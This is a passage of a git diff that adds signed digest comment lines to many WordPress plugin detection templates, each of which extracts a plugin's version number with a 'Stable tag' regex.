4b0a00483046022100a0d7dc00f6c381ba893a07b649e8b5be0c595ad0ae7779a42c0eb65bad5d1653022100d18f47fa12a2ab027348abb9d2cc8b41d063b7dc1c728c2f211dab28f748ae6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..f1fffb3565 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f693c077d0c66f35c2b89872b5b862dcd4b1653f3cc45dd05309527f54850f82022100d83a767d6f169192720d0844523dad62c72f1b375b9c67593c746050aed5c024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..e8d980840b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf6a0a1e2c8dfc0799a0846c04c676e338e5480dd87b380d1f1b9d4f388f2a4a02210088e35fafa4e6d4325400f8edabdb479a73dc48ec15ad1ed42bbcc4b3cc672caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..c017dec237 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a5a5417a1b6054d02f897a4825539303ad32370605f39c35972a0269cdfd9f502202b01962afcdd356faa430f8861789200ca011e77dcae00f4db7a1b87b76490d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..0e49ed9830 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c453a2df95d95441796d776e7ecb5020b8fa4759c501f930e8dc51acd869de610221009f19e6d82f136cdd34671a1090067c3a0a340cdb04eecbd074ad7a4edc983178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..885bbeb25e 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220145cb3688e6c5382a210945e5081850590fe3ad614666089ac9b953c6f9018b202205c8709480856d278a253562e6da6e9ee9a2a159f1ac4e1d6305877db49ceab4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..d7663273e1 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b749d23de6979db1d522948551720ab37f197e0d423a293caab40a64417cc3a02206b5e98c92906187a88bb8380366fdecac534696b3b287332914d86e16a7ffd19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..f2a05d96d4 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f59eafb3d42dd7c69419e26d7b457de0e9acd3b53d3de7634c94331ffa7f6490220113db7d9e40aa5d0e525d91370b86509ace8af094cea07f2c7ecdb82c429a35f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..724e3703f9 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022010463444cf13e1a674a096b7eda2be37ae2a7b806c66ab3081d49873dce73bb802206189273f83d2fec09f371fe173a3105e0af4a14d79784a8488279ecfe4a5005f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..b2a7ec46ab 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f1d9457567627e6dbb74ee65fbf7115404df32fcf95569611ddde42bf860e6ce022100ada8c1ab180a46e2bc1d4b12ce8bb4b0427c2d5de978a30ded761049004ab77e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..39892d3320 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022030b915c0eaff62ddb0f841093ae5beca831af696b0823fb54de413b66eb4cdaa022100c210622fb8cbbb085f7a210e18d0052189021e28e338f93eeb6c7b963124e04b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..5b0ccbe464 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205a02864e9bd674ace154cb15cc74dbc638cedbec01b0aadb7d243698aeb0e734022100e135032af12632a943b9646cc9df91f2ac3ee37e4a3dc944a83e59fe289eb51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..dcf503d241 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db10b615da688569ee2448361669cb0779c9b9f0145c46350a41b7e20664653602204a16e01ae8d33a136c92e358da55e66c53f65ce79a9a64443d278ee193ec7f4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..6a4216fb3b 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220099b9d5e73016c96a9f6759b4d44d4e8db0c2ea5623370c0320d742bba81d61f02202f1871d7bd6ef97a03296eb383931558abb287d1102c42e417d14bb1aef4d292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..ba71e7a1e2 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061cb360bdc54b4d923bca03e277d3043c7dfacaa630baaa410cbdc75d1d4d9f3022100c36f46c42807eec68e302771ef34961c8a1881c747e065498b7ad2e36fb027ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..54558bcf24 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022003810d4bf59ece18039bfa8e5121250d0bc3b7f39d230d07219e7af302c14758022100c645f75309ea9c921b5d4e7f71abea90d0ffffa3079091e0c6aaf4896db65362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..9b643600af 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b677c2157c9f97b616fcaba40f0343df9e727c020bb35a703abd83a78e0a174022016df13c5675b8445a2d94b1649f1b100272fd121093f438891c07c8be186829d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..f2192b1edf 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201b4048d0fec93bb141a2d738497450b76e4a73ab93eafb7df41eee82e1979e4d022100e77987e2b7432eccf50c4e1d49e7fd23602fe9e83e2d12f10cf189296052cd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..6a51a58d21 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017e22df5a08704af39c492ffc6fc1f18ec17cfb2a8b82ce220c51d2e91242ac8022100e2f47dd165ee412b30a46287fdcc4d5a911835ac0cf4acaaf7e8d28b53942567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..49f01b9eb0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009cacbb29baedfd807a6fdd6c1dbd5dfaef743bb7727fcd13f07b72a3d2f0177d02205d25405c568373da0469f1d313e506d0fd30128b59fb70f085f7637345ef084e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..2f0d45fb47 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203f1900a6dc5a983917ec9c11ac56e27b4ebc629406200d4dd554a8bd413d1043022100d47fc2019f58d66a65d831be092d9f44bd53e173c33ff0eec2ddc9ca6448a47b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..6149b493a0 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b6987176ca1d1fca93348f2d17ae5b594d50ec5c858d23a0a03dab0d4e308d8602203e12a7cc770b89fdfbb0d9f8a42c2de1865dc1f4e896ce60dfb9ed89728007e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..9be94c5838 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100875bc27a67988410e46c7f592e48c6fb8ec58c0dc5c1356cacece1a13e288224022003d06821b26cab89aed2b707a0245d6bf57377bc340a18e783d7401709043ea7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..2ed4df9634 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d68154b088e3e482040b9bf68a24d085559d5f21688152c1a7f83e9eec6b0d4022100c8d43092e3bd98f0209dd66104fe76953144b61b0c339495002025e52660ae1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..3982aea83f 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203553f050d1007f538150d03e735d8623273d356e08ce14a1c9cabc3092f8f249022100dbacc86592da36404c98d48732009bd6ab5750c4cfd39fbb55294d444f257fbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..ff4973b6cd 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201918395ed5a6962378da45063fcdb615318c41f42786cc626060bb0309f398cd0220159eedfa18787b160859b65edea47528d38991050b805527ce716c72f1d0995d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..853c704e6e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206091bf1d92607e7c56866bdc655e4d7592f0af967803ea8e9ae3eaa8fcfe83f7022100dcddf2d50a6d6d0d544d641bedeb55ab1ab8630c378c407c1f7f13538063fb15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..18f952b3ec 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206fdeeb56c9e66c767ddaaa03c5e28fb6dcca74770fa28ca95d499ea4dd99a4cc022100a14e1f6398d3530281a3f767153e6d62bcdcc26dbe8b1d50f72b54090152628c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..48c63998ef 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1e69096adf02495f75b877190e93508b02ad28243d16e3e9349c13a442f4a3902206f3d84f25cb44c6e67f0991b57abceaa1c18af13b323912847195ad41bf83be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..1b33c82b48 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220567adc4323f1cce56e2001ae2c5c527629f138be436c62a8a445225da4107375022100fb26c950755258bc1b828f351dd3856fda080d2bb39aeece07be19b7cb219f43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..fc773fdfa8 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009be5fc49670b99e817edeea7cb6ebeeb380c36caba80050670a4864a63890083022068decf9ed29ae01226f626781c984eb8999c5a92ce0474c66b0cebfbbe37cbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..90944a26d8 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e9a72196169a2bda273f6c9053f5689a3226ed712c0581edac840158a81d63c022051214840beac10477cf8cc6cdbe49242875e23f9c42e397ffb80e0eb44ad9b39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..1a9d3c5b4c 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100be8f8f6fe5c026e226a28d4addedf62432a8af25fdd1c9d5395baea78b5290b402205e27aeb1dd19e9fd60d56ed4ede7a5d0dea546e6e0b4e9824a51eff164649281:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..968b0fd16d 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c13d6913e18d9f3763a32892922c5a26f94f64023acdbf43d72ad53483036aea0221008337717fa1bb5bb4c4b8815ac0650c1cb17969d0d79f67f9cd5c20c3d924061c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..e10649a204 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a66e91ecfcf51f779938971aff97145737f8521decc035c3ae0556249fd138a022100c00d228bbd57390d4c1d0bc32916c9b3b8bd8f400aa173fb4fe5932ea53a379c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..c7c3e7aa83 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c89c6a7f323e9f8a3b1e85eb7ee35e7af6689164fb6856a99dbc51f45296a4e3022000c39c513229b53c67f2b80f78b525c95036d04f723fa827785a210b72ca922e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..f53fb6ec9d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100baf473a88ffe645cdccb59e2f339e9922a76a3aee02908f491ea41bcf3082ed6022003d5de7129d70b8685a0eaadf8a97d7a1a48f9b14c572ce706c7ad7d03b4f180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..6b57fe40dd 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e1970bac91e59cc353b3df3581afeed45c076b94ccec54ac804a1bb9bb5df8002200dce11266707fd95f522cd50f9a33977d1419f02b47663c2c79c3c4eee01d013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..c7a7b2d4f8 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210087485d6b01bbadd188de5da50e0916128ffad2ab8b6a5eea0bf6d3f7421afc3e02200256875106937d8cc91c1c0ae9d1836d106494d04efaef0c28ec02042afef391:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..2387628ab6 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d15650f35b369222d3ef23f756c3ddb1b0ad53e6c4f5aa5aaa19429e9d1810f022100f4a6150b59ac2cf60ba6262cf052d743405e80497fc62b3ef50f1d6088aaca13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..4f3ae186a9 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a33ab72b6ebfd24e7862c91c1de5697e85fb811427d23971f25335a16c9129ef022100f5cba78ecc1b84262ea7c52086d32bf211a91d2bffeeea45713cb6372c24eddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..6f957877a8 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203e1259675b63ec20be1c0cb0039e5265f635d264b305e9cb901412aefa851c89022100dc969fff69e4175f868472c9be7d737d33c86dd61084decb44421f0e1d43a482:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..aac6a14960 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e549915d166379adaabf2d4669f50b571cb332613cd1c5a0c15bff3c3e53e0a7022041155cb555d0e4f03740cd21a0a8f355a0ddfe2a8f380b6bb264a2ee26e1daf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..8886365d49 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a535b4cc5a6483596fbf2f77b260b04f2eb155b96ff5b2453431df502a37ba5b022100a1d8e617d8c58550a47c40d9048d7c49bd5f56785d624907943733537c3746c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..f3941ee197 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008102bf18ba0c53cb9f5346997b953886ac9f1f19066fde55b56c880615a816ed0220097283a74fed9f004472bf3af77db922e7fbac0505dcc31c59832558050f6730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..7389787baf 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e9319c82fec385b48789133577f89a4208ded8e929cd81fc2a3f3a621d5852a0220634dd83ff3642fb204bbb31352467d605a8b650225c15c5fb13e910d1d88ca93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..c378cd06b6 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022056d38547d3e6eaa3f808b92e4971356cc39de4a1a2490440df22fea730f3d2df022100f460add9948e27a8a5fb8eb058e3f1092edb7856929a2ff79614eae0758cc6fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..61e33af879 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' 